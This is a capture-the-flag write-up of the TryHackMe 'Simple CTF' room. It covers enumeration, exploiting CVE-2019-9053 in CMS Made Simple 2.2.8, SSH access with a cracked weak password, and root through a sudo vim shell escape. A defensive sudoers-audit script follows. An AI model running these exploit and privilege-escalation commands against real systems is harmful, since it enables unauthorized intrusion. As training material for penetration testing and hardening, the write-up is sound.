The FTP server was anonymous. The password was “secret”. The vim binary was sudo. This box didn’t hide anything, it just waited to see if you’d look.
Some rooms on TryHackMe are designed to humble you.
Simple CTF is not one of them. It’s designed to teach you something more valuable than a complex exploit chain. It’s designed to teach you where to look. A note on an FTP server. A CMS version number. A single line from sudo -l. That's all it took.
Three services. Three mistakes. Full root.
Let’s walk through it.
Reconnaissance
nmap -sC -sV -oN simple.nmap 10.0.0.2

21/tcp open ftp vsftpd
80/tcp open http Apache
2222/tcp open ssh OpenSSH

SSH on a non-standard port — 2222 instead of 22. Small detail, worth noting. Everything else looks familiar. Port 80 is where the story starts, but the FTP server drops the first hint.
FTP — Anonymous and Talkative
ftp 10.0.0.2
# Login: anonymous

Anonymous login allowed. Inside, a note of someone complaining that the developer used a weak password for a system account.
This is not a red herring. This is the box talking to you directly.
File it away and move on.
Web Enumeration — Finding the CMS
The default Apache page greets you on port 80. Nothing useful on the surface, so let Gobuster do the work:
gobuster dir -u http://10.0.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/simple/ comes back. Navigate there: it's a CMS Made Simple installation, and it's kind enough to display its version number in the footer:

CMS Made Simple 2.2.8

Exploitation — CVE-2019-9053
A quick search confirms it: CMS Made Simple 2.2.8 is vulnerable to CVE-2019-9053, an unauthenticated time-based blind SQL injection in the news module.
python3 exploit.py -u http://10.0.0.2/simple/ --crack -w /usr/share/wordlists/rockyou.txt

The exploit extracts a username, a password hash, and a salt. Crack it and the password comes back:

username: mitch
password: secret

The FTP note was right. Weak password. Same one used across the system.
Foothold — SSH on Port 2222
ssh mitch@10.0.0.2 -p 2222

Shell as mitch. The user flag is sitting in the home directory:

cat /home/mitch/user.txt

One credential. One note that told you it was weak. That’s all it took.
Privilege Escalation — vim Is Not Just a Text Editor
sudo -l

User mitch may run the following commands:
    (root) NOPASSWD: /usr/bin/vim

vim. With sudo. No password required.
Most people see vim and think text editor. On a penetration test, you see vim with sudo and you think shell escape.
GTFOBins documents this perfectly:
sudo vim -c ':!/bin/bash'

vim opens, executes the command, and drops you into a bash shell as root.

cat /root/root.txt

Done.
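The defender's side of this section: a small audit that reads sudoers-format rules and flags exactly the pattern this box has, NOPASSWD grants and binaries GTFOBins lists as able to escape to a shell. This is an added example, not code from the writeup; the sudoers text is a constructed sample (not the box's real file) and SHELL_CAPABLE is an assumed subset of the GTFOBins list.

```python
import re

# Assumed subset of binaries GTFOBins lists as able to spawn a shell
# from inside the program (editors, pagers, interpreters). Extend as needed.
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "man", "find",
                 "awk", "perl", "python3", "bash", "sh"}

# sudoers rule shape: user  host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudoers(text):
    """Return (user, runas, binary, reasons) for every risky sudoers rule.

    A rule is flagged when it needs no password (NOPASSWD), grants ALL,
    or grants a binary that can escape to a shell (the vim case above).
    Rules for root itself are skipped: root gaining root is not a finding.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        m = RULE_RE.match(line)
        if not m or m.group("user") == "root":
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            reasons = []
            if "NOPASSWD" in tags:
                reasons.append("NOPASSWD")
            if binary == "ALL":
                reasons.append("ALL")
            elif binary in SHELL_CAPABLE:
                reasons.append("shell-escape")
            if reasons:
                findings.append((m.group("user"), m.group("runas"), binary, reasons))
    return findings


# Constructed sample sudoers; the mitch line mirrors the rule found on this box.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
ops     ALL=(root) /usr/sbin/service apache2 restart
dev     ALL=(root) NOPASSWD: /usr/bin/less, /usr/bin/id
"""

if __name__ == "__main__":
    for user, runas, binary, reasons in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}) {binary}: {', '.join(reasons)}")
```

Run it against `/etc/sudoers` and the files in `/etc/sudoers.d/`; the ops line shows that a narrow, password-protected service command is not flagged, only the shell-capable and passwordless grants are.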
Simple CTF is a free room on TryHackMe. This writeup is for educational purposes only. All testing performed on dedicated lab infrastructure with explicit authorization.